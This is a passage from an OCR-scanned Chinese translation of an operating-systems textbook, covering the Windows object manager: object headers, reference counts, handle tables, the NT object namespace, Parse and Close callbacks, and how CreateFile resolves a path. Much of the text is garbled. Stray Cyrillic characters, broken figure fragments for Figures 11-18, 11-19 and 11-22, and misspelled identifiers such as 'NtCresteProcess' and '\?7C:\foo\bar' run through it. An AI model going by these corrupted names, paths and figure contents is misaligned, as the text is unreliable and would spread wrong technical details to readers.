一 旦 Windows 启 动 组 件 加 载 到 内 存 中 ， 控 制 就 转移 给 NTOS 中 的 低级 代码 ， 来 完成 初始 化 HAL、 内 
核 和 执行 体 、 链 接 驱 动 像 、 访 问 /更 新 系统 配置 中 的 数据 等 操作 。 所 有 内 核 态 的 组 件 初始 化 后 ， 第 一 个 
用 户 态 进程 被 创建 ， 使 用 运行 着 的 smss.exe 程 序 (如 同 UNIX 系 统 中 的 /etc/init) 。 

Windows 启 动 程序 在 遇 到 系统 启动 失败 时 ， 有 专门 处 理 常用 问题 的 逻辑 。 有 时 安装 一 个 坏 的 设备 驱 
动 程序 ， 或 运行 一 个 像 注册 表 一 样 的 程序 (能 导致 系统 储 入 损坏 )， 会 阻止 系统 正常 启动 。 系 统 提供 了 
一 种 功能 来 支持 忽略 最 近 的 变化 并 启动 到 最 近 一 次 的 系统 正确 配置 。 其 他 启动 选项 包括 安全 启动 ， 它 关 
闭 了 许多 可 选 的 驱动 程序 。 还 有 故障 恢复 控制 台 ， 启 动 cmd.exe 命 令 行 窗口 ， 它 提供 了 一 个 类 似 UNIX 的 
单 用 户 态 。 

另 一 个 常见 的 问题 ， 用 户 认为 ， 一 些 Windows 系 统 偶尔 看 起 来 很 不 可 思议 ， 经 常 有 系统 和 应 用 程序 
的 (看 似 随机 ) 崩溃 。 从 微软 的 在 线 崩溃 分 析 程 序 得 到 的 数据 ， 提供 了 许多 崩溃 是 由 于 物理 内 存 损坏 导 
致 的 证 据 。 所 以 Windows Vista 启 动 进程 提供 了 一 个 运行 广义 上 的 内 存 诊断 的 选项 。 也 许 未 来 的 PC 硬件 
将 普遍 支持 ECC (或 者 部 分 ) 内 存 ， 但 是 今天 的 大 多 数 台式 机 和 笔记 本 电脑 系统 很 容易 受到 攻击 ， 即 便 
是 在 它们 所 包含 的 数 十 亿 比特 的 内 存 中 的 单 比特 错误 。 


11.3.3 对 象 管理 器 的 实现 

对 象 管理 器 也 许 是 Windows 可 执行 过 程 中 一 个 最 重要 的 组 件 ， 这 也 是 为 什么 我 们 已 经 介绍 了 它 的 许 
多 概念 。 如 前 所 述 ， 它 提供 了 一 个 统一 的 和 一 致 的 接口 ， 用 于 管理 系统 资源 和 数据 结构 ， 如 打开 文件 、 
进程 、 线 程 、 内 存 部 分 、 定 时 器 、 设 备 、 驱 动 程序 和 信号 。 更 为 特殊 的 对 象 可 以 表示 一 些 事物 ， 像 内 核 
的 事务 、 外 形 、 安 全 令 牌 和 由 对 象 管理 器 管理 的 Win32 桌 面 。 设 备 对 象 和 1/O 系 统 的 描述 联系 在 一 起 ， 包 
括 提供 NT 名 字 空间 和 文件 系统 卷 之 间 的 链接 。 配 置 管理 器 使 用 一 个 Key 类 型 的 对 象 与 注册 配置 相 链接 。 
对 象 管理 器 自身 有 一 些 对 象 ， 它 用 于 管理 NT 名 字 空 间 和 使 用 公共 功能 来 实现 对 象 。 在 这 些 目录 中 ， 有 
象征 性 的 联系 和 对 象 类 型 的 对 象 。 

由 对 象 管理 器 提供 的 统一 性 有 不 同 的 方面 。 所 有 这 些 对 象 使 用 相同 的 机 制 ， 包 括 它们 是 如 何 创建 、 
销毁 以 及 定额 分 配 值 的 占有 。 它 们 都 可 以 被 用 户 态 进程 通过 使 用 句柄 访问 。 在 内 核 的 对 象 上 有 一 个 统一 
的 协议 管理 指针 的 引用 。 对 象 可 以 从 NT 的 名 字 空间 (由 对 象 管理 器 管理 ) 中 得 到 名 字 。 调 度 对 象 【那些 以 
信号 事件 相关 的 共同 数据 结构 开始 的 对 象 ) 可 以 使 用 共同 的 同步 和 通知 接口 ， 如 WaitForMultipleObjects。 
有 一 个 共同 的 安全 系统 ， 其 执行 了 以 名 称 来 访问 的 对 象 的 ACL， 并 检查 每 个 使 用 的 句柄 。 甚 至 有 工具 帮 
助 内 核 态 开发 者 ， 在 使 用 对 象 的 过 程 中 追踪 调试 问题 。 

理解 对 象 的 关键 是 要 意识 到 一 个 (执行) 对 象 仅仅 是 内 核 态 下 在 虚拟 内 存 中 可 以 访问 的 一 个 数据 
结构 。 这 些 数据 结构 ， 常 用 来 代表 更 抽象 的 概念 。 例 如 ， 执 行文 件 对 象 会 为 那些 已 打开 的 系统 文件 的 每 
-个 实例 而 创建 。 进 程 对 象 被 创建 来 代表 每 一 个 进程 。 

一 种 事实 上 的 结果 是 ， 对 象 只 是 内 核 数据 结构 ， 当 系统 重新 启动 时 (或 崩溃 时 ) 所 有 的 对 象 都 将 丢 
失 。 当 系统 启动 时 ， 没 有 对 象 存在 ， 甚 至 没有 对 象 类 型 描述 。 所 有 对 象 类 型 和 对 象 自身 ， 由 对 象 管理 器 
提供 接口 的 执行 体 的 其 他 组 件 动态 创建 。 当 对 象 被 创建 并 指定 一 个 名 字 ， 它 们 可 以 在 以 后 通过 NT 名 字 
空间 被 引用 。 因 此 ， 建 立 对 象 的 系统 根 目录 还 建立 了 NT 名 字 空间 。 

对 象 结构 ， 如 图 11-17 所 示 。 每 个 对 象 包含 一 个 对 所 有 类 型 的 所 有 对 象 的 某 些 共性 信息 头 。 在 这 个 
头 的 领域 内 包括 在 名 字 空 间 内 的 对 象 的 名 称 ， 对 象 目录 ， 并 指向 安全 描述 符 代表 的 ACL 对 象 。 

对 象 的 内 存 分 配 来 自由 执行 体 保持 的 两 个 堆 (或 池 ) 的 内 存 之 一 。 在 有 ( 像 内 存 分 配 ) 效用 函数 的 执 
行 体 中 ， 允 许 内 核 态 组 件 不 仅 分 配 分 页 内 核 内 存 ， 也 分 配 无 分 页 内 核 内 存 。 对 于 那些 需要 被 具有 CPU 2 级 
以 及 更 高 优先 级 的 对 象 访问 的 任何 数据 结构 和 内 核 太 是 对 象 ， 无 分 页 内 存 都 是 需要 的 。 这 包括 ISR 和 DPC 
(但 不 包括 APC) 和 线程 调度 本 身 。 访 pagefauh 处 理 也 需要 由 无 分 页 内 核 内 存 分 配 的 数据 结构 ， 以 避免 递 轨 。 

大 部 分 米 自 内 核 堆 管理 器 的 分 配 ， 是 通过 使 用 每 个 处 理 器 后 备 名 单 来 获得 的 ， 这 个 后 备 名 单 中 包含 
分 配 大 小 一 致 的 LIFO 列 表 。 这 些 LIFO 优化 不 涉及 锁 的 运作 ， 可 提高 系统 的 性 能 和 可 扩展 性 。 
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close 方 法 
Delete 方 法 
Querty name 方 法 
Parse 方 法 
Security 方 法 


图 11-17 对 象 管理 器 管理 的 执行 体 对 象 的 结构 


每 个 对 象 标 头 包含 一 个 配额 字段 ， 这 是 用 于 对 进程 访问 一 个 对 象 的 配额 征收 。 配 额 是 用 来 保持 用 户 
使 用 较 多 的 系统 资源 。 对 无 分 页 核心 内 存 (这 需要 分 配 物理 内 存 和 内 核 虚拟 地 址 ) 和 分 页 的 核心 内 存 (使 
用 了 内 核 虚 拟 地 址 ) 有 不 同 的 限制 。 当 内 存 类 型 的 累积 费用 达到 了 配额 限制 ， 由 于 资源 不 足 而 导致 给 该 进 
程 的 分 配 失 败 。 内 存 管理 器 也 正在 使 用 配额 来 控制 工作 集 的 大 小 和 线程 管理 器 ， 以 限制 CPU 的 使 用 率 。 

物理 内 存 和 内 核 虚 拟 地 址 都 是 宝贵 的 资源 。 当 一 个 对 象 不 再 需要 , 应 该 取消 并 回收 它 的 内 存 和 地 址 。 
但 是 ， 如 果 一 个 仍 在 被 使 用 的 对 象 收 到 新 的 请 求 ， 则 内 存 可 以 被 分 配给 另 一 个 对 象 ， 然 而 数据 结构 有 可 
能 被 损坏 。 在 Windows 执 行 体 中 可 以 很 容易 发 生 这 样 的 问题 ， 因 为 它 是 高 度 多 线程 的 ， 并 实施 了 许多 异 
步 操作 〈 例 如 ， 在 完成 特定 数据 结构 之 上 的 操作 之 前 ， 就 返回 这 些 数据 结构 传递 给 函数 的 调用 者 ) 。 

为 了 避免 由 于 竞争 条 件 而 过 早 地 释放 对 象 ， 对 象 管理 器 实现 了 一 个 引用 计数 机 制 ， 以 及 引用 指针 的 
概念 。 需 要 一 个 参考 指针 来 访问 一 个 对 象 ， 即 便 是 在 该 物体 有 可 能 正 要 被 删除 时 。 根 据 每 一 个 特定 对 象 
类 型 有 关 的 协议 里 面 ， 只 有 在 某 些 时 候 一 个 对 象 才 可 以 被 另 一 个 线程 删除 。 在 其 他 时 间 使 用 的 锁 ， 数 据 
结构 之 间 的 依赖 关系 ， 甚 至 是 没有 其 他 线程 有 一 个 对 象 的 指针 ， 这 些 都 能 够 充分 保护 一 个 对 象 ， 使 其 避 
免 被 过 早 删 除 。 

1. 2% 

用 户 态 提 到 内 核 态 对 象 不 能 使 用 指针 ， 因 为 它们 很 难 验证 。 相 反 内 核 态 对 象 必须 使 用 一 些 其 他 方式 
命名 ， 使 用 户 代码 可 以 引用 它们 。Windows 使 用 句柄 来 引 


用 内 核 态 对 象 。 句 柄 是 不 透明 值 (opaque value) ， 该 不 人 PAPRATI 
透明 值 是 被 对 象 管理 器 转换 到 具体 的 应 用 ， 以 表示 一 个 表 指针 | “| | 
对 象 的 内 核 态 数据 结构 。 图 1L-18 表 示 了 用 来 把 句柄 转换 ЕЕЕ: 
成 对 象 的 指针 的 句柄 表 的 数据 结构 。 句 柄 表 增加 额外 的 7 


间接 层 来 扩展 。 每 个 进程 都 有 自己 的 表 ， 包 括 该 系统 的 
进程 ， 其 中 包含 那些 只 含有 内 核 线程 与 用 户 态 进 程 不 相 


关 的 进程。 == 
图 11-19 显 示 ， 句 柄 表 最 大 支持 两 个 额外 的 间接 层 。 ”图 11-18 使 用 一 个 单独 页 达到 512 个 句柄 的 
这 使 得 在 内 核 态 中 执行 代码 能 够 方便 地 使 用 句柄 ， 而 不 最 小 表 的 句柄 表 数据 结构 


是 引用 指针 。 内 核 句 枉 都 是 经 过 特殊 编码 的 ， 从 而 它们 能 够 与 用 户 态 的 句柄 区 分 开 。 内 核 句 栖 都 保存 在 
系统 进程 的 句柄 表 里 ， 而 且 不 能 以 用 户 态 存 取 。 就 像 大 部 分 内 核 虚 拟 地 址 空间 被 所 有 进程 共享 ， 系 统 句 
柄 表 由 所 有 的 内 核 成 分 共享 ， 无 论 当 前 的 用 户 态 进程 是 什么 。 

用 户 可 以 通过 Win32 调 用 的 CreateSemaphore 或 OpenSemaphore 来 创建 新 的 对 象 或 打开 一 个 已 经 
存在 的 对 象 。 这 些 都 是 对 程序 库 的 调用 ， 并 且 最 后 会 转向 适当 的 系统 调用 。 任 何 成 功 创建 或 打开 对 象 的 
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指令 的 结果 ， 都 是 储存 在 内 核 内 存 的 进程 私有 句柄 表 的 一 个 64 位 句柄 表 入 口 。 表 中 句柄 逻辑 位 置 的 32 位 
索引 返回 给 用 户 用 于 随后 的 指令 。 内 核 的 64 位 句柄 表 入 口 包含 两 个 32 位 字 节 。 一 个 字 节 包含 29 位 指针 指 
向 包头 。 其 后 的 3 位 作为 标志 (例如 ， 表 示 句 柄 是 否 被 它 创建 的 进程 继承 ) 。 这 3 位 在 指针 就 位 以 前 是 被 
屏蔽 掉 的 。 其 他 的 字 节 包含 一 个 32 位 正确 掩 码 。 这 是 必需 的 因为 只 有 在 对 象 创建 或 打开 的 时 候 许 可 校 验 
才 会 进行 。 如 果 一 个 进程 对 某 对 象 只 有 只 读 的 权限 ， 那 在 表示 其 他 在 掩 码 中 的 权限 位 都 为 0， 从 而 让 操 
作 系 统 可 以 拒绝 除 读 之 外 对 对 象 进行 任何 其 他 的 操作 。 


句柄 表 描 述 符 D: 句 柄 表 入 口 [32] 


Kiket 

B: 句 炳 表 入 口 [1024] 
П li E: 句 柄 表 人 口 [1024] 

п{512] ig. | Ш 

Г 下 :句柄 表 入 口 [512] 


一 [于 >Ш 
对 象 [С РЕЖ А, 1512] 
Ш) 


图 11-19 最 多 达到 1600 万 个 句柄 的 句柄 表 数 据 结构 


2. 对 象 名 字 空 间 

进程 可 以 通过 由 一 个 进程 把 到 对 象 的 句 栖 复 制 给 其 他 进程 来 共享 对 象 。 但 是 这 需要 复制 的 进程 有 到 
其 他 进程 的 句柄 ， 而 这 样 在 多 数 情况 中 并 不 适用 ， 例 如 进程 共享 的 对 象 是 无 关 的 或 被 其 他 进程 保护 的 。 
在 其 他 情况 下 ， 对 象 即使 在 不 被 任何 进程 调用 的 时 候 仍然 保持 存在 是 非常 重要 的 ， 例 如 表示 物理 设备 的 
对 象 ， 或 用 户 实现 对 象 管理 器 和 它 自己 的 NT 名 字 空 间 的 对 象 。 为 了 地 址 的 全 面 分 享 和 持久 化 需求 ， 对 
象 管理 允许 随意 的 对 象 在 被 创建 的 时 候 就 给 定 其 NT 名 字 空 间 中 的 名 字 。 然 而 ， 是 由 执行 部 件 控制 特定 
类 型 的 对 象 来 提供 接口 ， 以 使 用 对 象 管理 器 的 命名 功能 。 

NT 名 字 空 间 是 分 级 的 ， 借 由 对 象 管理 器 实现 目录 和 特征 连接 。 名 字 空 间 也 是 可 扩展 的 ， 通 过 提供 
一 个 叫做 Parse 的 进程 程序 允许 任何 对 象 类 型 指定 名 字 空 间 扩展 。Parse 程 序 是 一 个 可 以 提供 给 每 一 个 对 
象 类 型 的 对 象 创建 时 使 用 的 程序 ， 如 图 11-20 所 示 。 


程序 使 用 时 候 备注 

Open 用 于 每 个 新 的 句柄 很 少 使 用 

Parse 用 于 扩展 名 字 空 间 的 对 象 类 型 用 于 文件 和 档案 密 负 
Close 最 后 句柄 关闭 请 除 可 见 结果 
Delete 最 后 一 个 指针 撤销 | REMA 
Security 得 到 或 设置 对 象 的 安全 撕 述 符 保护 

QueryName | 得 到 对 象 名 称 外 核 很 少 使 用 


图 11-20 用 于 指定 一 个 新 对 象 类 型 的 对 象 语句 

Open 语 名 很 少 使 用 ， 因 为 默认 对 象 管理 器 的 行为 才 是 必需 的 ， 所 以 程序 为 所 有 基本 对 象 类 型 指定 
为 NULL。 

Close 和 Delete 语 句 描述 对 象 完成 的 不 同 阶段 。 当 对 象 的 最 后 一 个 句柄 关闭 ， 可 能 会 有 必要 的 动作 清 
空 状 态 ， 这 些 由 Close 语 名 来 执行 ， 当 最 后 的 指针 参考 从 对 象 移 除 ， 使 用 Delete 语 句 ， 从 而 对 象 可 以 准备 
被 而 除 并 使 其 内 存 可 以 重用 。 利 用 文件 对 象 ， 这 两 个 语句 都 实现 为 1O 管 理 器 里 面 的 回调 ， IO 管理 器 是 
声明 了 对 象 类 型 的 组 件 。 对 象 管理 操作 使 得 由 设备 堆栈 发 送 的 IO 操作 能 够 与 文件 对 象 关联 上 ， 而 大 多 
数 这 些 工作 由 文件 系统 完成 。 

Parse 语 句 用 来 打开 或 创建 对 象 ， 如 文件 和 登录 密码 ， 以 及 扩展 NT 名 字 空间 。 当 对 象 管理 器 试图 通 
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过 名 称 打开 一 个 对 象 并 遭遇 其 管理 的 名 字 空 间 树 的 叶 结 点 ， 它 检查 该 叶 结 点 对 象 类 型 是 否 指定 了 一 个 
Parse 语 句 。 如 果 有 ， 它 会 引用 该 语句 ， 将 路 径 名 中 未 用 的 部 分 传 给 它 。 再 以 文件 对 象 为 例 ， 叶 子 结 点 是 
-个 表现 特定 文件 系统 卷 的 设备 对 象 。Parse 语 句 由 IO 管理 器 执行 ， 并 发 起 在 对 文件 系统 的 IO 操作 ， 以 
填充 一 个 指向 文件 的 公开 实例 到 该 文件 对 象 ， 这 个 文件 是 由 路 径 名 指定 的 。 我 们 将 在 以 后 逐步 探索 这 个 
特殊 的 实例 。 

QueryName 语 句 是 用 来 查找 与 对 象 关联 的 名 字 。Security 语 句 用 于 得 到 、 设 置 或 删除 该 安全 描述 符 
的 对 象 。 对 于 大 多 数 类 型 的 对 象 ， 此 程序 在 执行 的 安全 引用 监视 器 组 件 里 提供 一 个 标准 的 切 人 点 。 

注意 ， 在 图 11-20 里 的 语句 并 不 执行 每 种 对 象 类 型 最 感 兴趣 的 操作 。 相 反 ， 这 些 程序 提供 给 对 象 管 
理 器 正确 实现 功能 所 需要 的 回调 函数 ， 如 提供 对 对 象 的 访问 和 对 象 完成 时 的 清理 工作 。 除 了 这 些 回调 ， 
对 象 管理 器 还 提供 了 一 套 通 用 对 象 例 程 ， 例 如 创建 对 象 和 对 象 类 型 ， 复 制 句柄 ， 从 句 栖 或 者 名 字 获 得 引 
用 指针 ， 并 增加 和 减 去 对 象 头 部 的 参考 计数 。 

对 象 感 兴趣 的 操作 都 是 在 本 地 NT APi 系 统 调用 ， 如 NtCresteProcess、NtCreateFile 或 NtClose 
《关闭 句 栖 所 有 类 型 的 通用 操作 ) ， 如 图 11-9 所 示 。 

虽然 对 象 名 字 空 间 对 整个 运作 的 系统 是 至 关 重要 的 ， 但 却 很 少 有 人 知道 它 的 存在 ， 因 为 没有 特殊 的 
浏览 工具 的 话 它 对 用 户 是 不 可 见 的 。winobj 就 是 一 个 这 样 的 浏览 工具 ， 在 www. microsoft. com/ technet/ 
sysinternals 可 免费 获得 。 在 运行 时 ， 此 工具 描绘 的 对 象 的 名 字 空 间 通常 包含 对 象 目录 ， 如 图 11- 21 列 出 
来 的 及 其 他 一 些 。 

一 个 被 奇怪 地 命名 为 \?? 的 目录 包含 用 户 的 所 有 MS-DOS 类 型 的 设备 名 称 ， 如 A 表示 软驱 ，C， 表 
示 第 一 块 硬盘 。 这 些 名 称 其 实 是 在 设备 对 象 活跃 的 地 方 链接 到 目录 \ 装 置 的 符号 。 使 用 名 称 \?? 是 因为 其 
按 字母 顺序 排列 第 一 ， 以 加 快 查询 从 驱动 器 盘 符 开始 的 所 有 路 径 名 称 。 其 他 的 对 象 目录 的 内 容 应 该 是 自 
解释 的 。 


яж 内 容 全 
?? 查找 类 似 C: 的 MS-DOS 设 备 的 查找 起 始 位 置 | 
DosDevices | 目录 ?? | 
Device | 所 有 WO 设备 
Driver 每 个 加 载 的 设备 驱动 对 应 的 对 象 ] 
ObjectTypes 如 图 11-22 中 列 出 的 类 型 的 对 象 
Windows 发 送 消 息 到 所 有 Win32 GUI 窗口 的 对 象 
BaseNamedObjects | 用 户 创建 的 Win32 对 象 ， 如 信号 县、 互 斥 最 竺 
Arcname 由 启动 装载 器 发 现 的 分 区 名 称 
NLS National 语 言 支持 对 象 ] 
FileSystem 文件 系统 驱动 对 象 和 文件 系统 识别 对 象 
Security 安全 系统 的 对 象 
KnownDLLs 较 早 开启 和 一直 开启 的 关键 共享 库 


图 11-21 在 对 象 名 字 空 间 中 的 一 些 典型 目录 


如 上 所 述 ， 对 象 管理 器 保持 一 个 单独 的 句柄 为 每 个 对 象 计数 。 这 个 计数 是 从 来 不 会 大 于 指针 引用 计 
数 ， 因 为 每 个 有 效 的 句柄 对 象 在 它 的 句柄 表 入 口 有 一 个 引用 指针 。 使 用 单独 句柄 计数 的 理由 是 ， 当 最 后 
一 个 用 户 态 的 引用 消失 的 时 候 ， 许 多 类 型 的 对 象 可 能 需要 清理 自己 的 状态 ， 尽 管 它们 尚未 准备 好 让 它们 
的 内 存 删除 。 

以 一 个 文件 对 象 为 例 表 示 一 个 打开 文件 的 实例 。Windows 系 统 中 文件 被 打开 以 供 独占 访问 。 当 文件 
对 象 的 最 后 一 个 句柄 被 关闭 ， 重 要 的 是 在 那 一 刻 就 应 该 删除 专 有 访问 ， 而 不 是 等 待 任何 内 核 引用 最 终 消 
失 《〈 例 如 ， 在 最 后 一 次 从 内 存 冲洗 数据 之 后 。) 否则 ， 从 用 户 态 关闭 并 重新 打开 一 个 文件 可 能 无 法 按 预 
期 的 方式 工作 ， 因 为 该 文件 看 来 仍然 在 使 用 中 。 

虽然 对 象 管理 器 在 内 核 具有 全 面 的 管理 机 制 来 管理 内 核 中 的 对 象 生命 周期 ， 不 论 是 NT API 或 Win32 
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API 的 都 没有 提供 一 个 引用 机 制 来 处 理 在 用 户 态 的 并 行 多 线程 之 间 的 句柄 使 用 。 从 而 多 线程 并 发 访问 句 
柄 会 带 来 竞争 条 件 (гасе condition) 和 bug， 例 如 ， 可 能 发 生 一 个 线程 在 别 的 线程 使 用 完 特定 的 句柄 之 
前 就 把 它 关闭 了 。 或 者 多 次 关闭 一 个 句柄 。 或 者 关闭 另 一 个 线程 仍然 在 使 用 的 句柄 ， 然 后 重新 打开 它 指 
向 不 同 的 对 象 。 

也 许 Windows 的 API 应 该 被 设计 为 每 个 类 型 对 象 带 有 一 个 关闭 AP1， 而 不 是 单一 的 通用 NTClose 操 
作 。 这 将 至 少 会 减少 由 于 用 户 态 线程 关闭 了 错误 的 处 理 而 发 生 错误 的 频率 。 另 一 个 解决 办 法 可 能 是 在 句 
柄 表 中 的 指针 之 外 再 添加 一 个 序列 域 。 

为 了 帮助 程序 开发 人 员 在 他 们 的 程序 中 寻找 这 些 类 似 的 问题 ，Windows 有 一 个 应 用 程序 验证 ， 软 件 
开发 商 能 够 从 Microsoft 下 载 。 我 们 将 在 11.7 节 介绍 类 似 的 驱动 程序 的 验证 器 ， 应 用 程序 验证 器 通过 大 量 
的 规则 检查 来 帮助 程序 员 寻 找 可 能 通过 普通 测试 无 法 发 现 的 错误 。 它 也 可 以 为 句柄 释放 列表 启用 先进 先 
出 顺序 ， 以 便 句 柄 不 会 被 立即 重用 ( 即 关闭 句柄 表 通 常 采 用 效果 较 好 的 LIFO 排 序 )。 防 止 句柄 被 立 即 重 
用 的 情况 发 生 ， 在 这 些 转 化 的 情况 下 操作 可 能 错误 地 使 用 一 个 已 经 关闭 的 句柄 ， 这 是 很 容易 检测 到 的 。 

该 设备 对 象 是 执行 体 中 一 个 最 重要 的 和 贯穿 内 核 态 的 对 象 。 该 类 型 是 由 1/O 管 理 器 指定 的 ， МО 
器 和 设备 驱动 是 设备 对 象 的 主要 使 用 者 。 设 备 对 象 和 驱动 程序 是 密切 相关 的 ， 每 个 设备 对 象 通常 有 一 个 
链接 指向 一 个 特定 的 驱动 程序 对 象 ， 它 描述 了 如 何 访问 设备 驱动 程序 所 对 应 的 IO 处 理 例 程 。 

设备 对 象 代表 硬件 设备 、 接 口 和 总 线 ， 以 及 远 辑 磁盘 分 区 、 磁 盘 卷 甚至 文件 系统 、 扩 展 内 核 ， 例 如 
防 病毒 过 滤器 。 许 多 设备 驱动 程序 都 有 给 定 的 名 称 ， 这 样 就 可 以 访问 它们 ， 而 无 需 打开 设备 的 实例 的 句 
柄 ， 如 在 UNIX 中 。 我 们 将 利用 设备 对 象 以 说 明 Parse 程 序 是 如 何 被 使 用 的 ， 如 图 11-22 所 示 。 


Win32 CreateFiletCAfoovbar) 用 户 态 
vo о) naa 
管理 器 [MCreateFile(\?7C\oo\ban) 
对 象 a) Н 
管理 器 【OpenOblectByName(?7CAfoovbanl |_ „Гр. 


ио 
管理 器 
ГЕ ЙЫ 
对 象 
ЕС 
сањн 


Ф@)| NtscreateFile0 |5C5mpleteRequest 


а) 
图 11-22 IO 和 对 象 管理 器 创建 /打开 文件 并 返回 文件 句柄 的 步骤 


D 当 一 个 执行 组 件 ， 如 实现 了 本 地 系统 调用 NTCreateFile 的 IO 管理 器 ， 在 对 象 管理 器 中 称 之 为 
ObOpenObjectByName， 它 发 送 一 个 NT 名 字 空 间 的 Unicode 路 径 名 ， 例 如 \?7C:\foo\bar。 

D) 对 象 管理 器 通过 目录 和 符号 链接 表 搜 索 并 最 终 认定 АРАС: 指 的 是 设备 对 象 (IO 管理 器 定义 的 一 
个 类 型 )。 该 设备 对 象 在 由 对 象 管理 器 管理 的 NT 名 字 空 间 中 一 个 叶 节 点 。 

3) 然后 对 象 管理 器 为 该 对 象 类 型 调用 Parse 程 序 ， 这 恰好 是 由 1/O 管 理 器 实现 的 lopParseDevice。 它 
不 仅 传递 一 个 指针 给 它 发 现 的 设备 对 象 〔C: )， 而 且 还 把 剩 下 的 字符 串 \foo\bar 也 发 送 过 去 。 

4) IO 管理 器 将 创建 一 个 IRP (IO 请 求 包 ) ， 分 配 一 个 文件 对 象 ， 发 送 请 求 到 由 对 象 管理 器 确定 的 设 
备 对 象 发 现 的 UO 设 备 堆栈 。 

5) IRP 是 在 MO 堆栈 中 逐 级 传递 ， 直 到 它 到 达 一 个 代表 文件 系统 C， 实例 的 设备 对 象 。 在 每 一 个 阶段 ， 
控制 是 通过 一 个 与 这 一 等 级 设备 对 象 相连 的 切入 点 传递 到 驱动 对 象 内 部 。 切入 点 用 在 这 种 情况 下 ， 是 为 
了 支持 CREATE 操 作 ， 因 为 要 求 是 创建 或 打开 一 个 名 为 oovbar 的 文件 。 
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6) 该 设备 对 象 中 遇 到 指向 文件 系统 的 IRP 可 以 表示 为 文件 系统 筛选 驱动 程序 ， 这 可 能 在 该 操作 到 达 对 
应 的 文件 系统 设备 对 象 之 前 修改 MO 操作 。 通 常情 况 下 这 些 中间 设 备 代表 系统 扩展 ， 例 如 反 病毒 过 滤器 。 

7) 文件 系统 设备 对 象 有 一 个 链接 到 文件 系统 驱动 程序 对 象 ， 叫 NTFS。 因 此 ， 驱 动 对 象 包含 NTFS 内 
创建 操作 的 地 址 范围 。 

8) NTFS 将 填补 该 文件 中 的 对 象 并 将 它 返 回 到 LO 管理 器 ，LO 管 理 器 备份 堆栈 中 的 所 有 设备 ， 直 到 
lopParseDevice 返 回 对 象 管理 器 (如 11.8 节 所 述 ) 。 

9) 在 对 象 管理 器 以 其 名 字 空间 中 的 查找 结束 。 它 从 Parse 程 序 收 到 一 个 初始 化 对 象 (这 正好 是 一 个 
文件 对 象 ， 而 不 是 原来 对 象 发 现 的 设备 对 象 )。 因 此 ， 对 象 管理 器 为 文件 对 象 在 目前 进程 的 句柄 表 里 创 
建 了 一 个 句柄 ， 并 对 需求 者 返回 句柄 。 

10) 最 后 一 步 是 返回 用 户 态 的 调用 者 ， 在 这 个 例子 里 就 是 Win32 АРІ CreateFile， 它 会 把 句柄 返回 
给 应 用 程序 。 

可 执行 组 件 能 够 通过 调用 ObCreateObjectType 接 口 给 对 象 管理 器 来 动态 创建 新 的 类 型 。 由 于 每 次 
发 布 都 在 变化 ， 所 以 没有 一 个 限定 的 对 象 类 型 定义 表 。 图 11-23 列 出 了 在 Windows Vista 中 非常 通用 的 一 
些 对 象 类 型 ， 供 快速 参考 。 


类 型 ж ж 

Process 用 户 进程 

Thread 进程 里 的 线程 

Semaphore 进程 内 部 同步 的 信号 量 

Мшех 用 来 控制 进入 关键 区 域 的 二 进 制 信号 量 

Event 具有 持久 状态 (已 标记 信号 \ 未 标记 信号 ) 的 同步 对 象 

ALPC Port 内 部 进程 消息 传递 的 机 制 

Timer 克 许 一 个 线程 固定 时 间 间 隔 休眠 的 对 象 

Queue 用 来 完成 异步 /0 通知 的 对 象 

Open file 关联 到 某 个 打开 的 文件 的 对 象 

Access token 某 个 对 象 的 安全 描述 符 

Profile 描述 CPU 使 用 情况 的 数据 结构 

Section 表述 映射 的 文件 的 对 象 

Key | 注册 表 关 键 宇 ， 用 于 把 注册 信息 关联 到 某 个 对 象 管理 名 字 空 间 

Object directory 对 象 管理 器 中 一 组 对 象 的 目录 

Symbolic link 通过 路 径 名 引用 到 另 一 个 对 象 管理 器 对 象 

Device 物理 设备 、 总 线 、 驱 动 或 者 卷 实例 的 HO 设 备 对 象 

Device driver 每 一 个 加 载 的 设备 驱动 都 有 它 自己 的 一 个 对 象 

图 11-23 对 象 管理 器 管理 的 一 些 通用 可 执行 对 象 类 型 
FR (process) 和 线程 (thread) 是 明显 的 。 每 个 进程 和 每 个 线程 都 有 一 个 对 象 来 表示 ， 这 个 对 象 

包含 了 管理 进程 或 线程 所 需 的 主要 属性 。 接 下 来 的 三 个 对 象 : 信号 量 、 互 斥 体 和 事件 ， 都 可 以 处 理 进程 
间 的 同步 。 信号 量 和 互 斥 体 按 预期 方式 工作 ， 但 都 需要 额外 的 响 铃 和 警 哨 〈 例 如， 最 大 值 和 超时 设 定 ) 。 


事件 可 以 在 两 种 状态 之 一 : 已 标记 信号 或 未 标记 信号 。 如 果 一 个 线程 等 待 事件 处 于 已 标记 信号 状态 ， 线 
程 被 立即 释放 。 如 果 该 事件 是 未 标记 信号 状态 ， 它 会 一 直 阻 塞 直到 一 些 其 他 线程 信号 释放 所 有 被 阻止 的 
线程 (通知 事件 ) 的 活动 或 只 是 第 一 个 被 阻止 的 线程 (同步 事件 )。 也 可 以 设置 一 个 事件 ， 这 样 一 种 信 
号 成 功 等 待 后 ， 它 会 自动 恢复 到 该 未 标记 信号 的 状态 而 不 是 处 在 已 标记 信号 状态 。 

端口 、 定 时 器 和 队列 对 象 也 与 通信 和 同步 相关 。 端 口 是 进 程 之 间 交 换 LPC 消 息 的 通道 。 定 时 器 提供 
-种 为 特定 的 时 间 区 间 内 阻塞 的 方法 。 队 列 用 于 通知 线程 已 完成 以 前 启动 的 异步 ШО 操作 ， 或 一 个 端口 
有 消息 等 待 。( 它 们 被 设计 来 管理 应 用 程序 中 的 并 发 的 水 平 ， 以 及 在 使 用 高 性 能 多 处 理 器 应 用 中 使 用 ， 
如 SQL)。 

当 一 个 文件 被 打开 时 ，Open file 对 象 将 会 被 创建 。 没 打开 的 文件 ， 并 没有 对 象 由 对 象 管理 器 管理 。 
访问 令 牌 是 安全 的 对 象 。 它 们 识别 用 户 ， 并 指出 用 户 具有 什么 样 的 特权 ， 如 果 有 的 话 。 配 置 文件 是 线程 
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的 用 于 存储 程序 计数 器 的 正在 运行 的 周期 样本 的 数据 结构 ， 用 以 确定 程序 线程 的 时 间 是 花 在 哪些 地 方 了 。 

段 用 来 表示 内 存 对 象 ， 这 些 内 存 对 象 可 以 被 应 用 程序 向 内 存 管理 器 请 求 ， 将 应 用 程序 的 地 址 空间 映 
射 到 这 个 区 域 中 来 。 它 们 记录 表示 磁盘 上 的 内 存 对 象 的 页 的 文件 (或 页 面 文件 ) 的 段 。 键 表示 的 是 象 管 
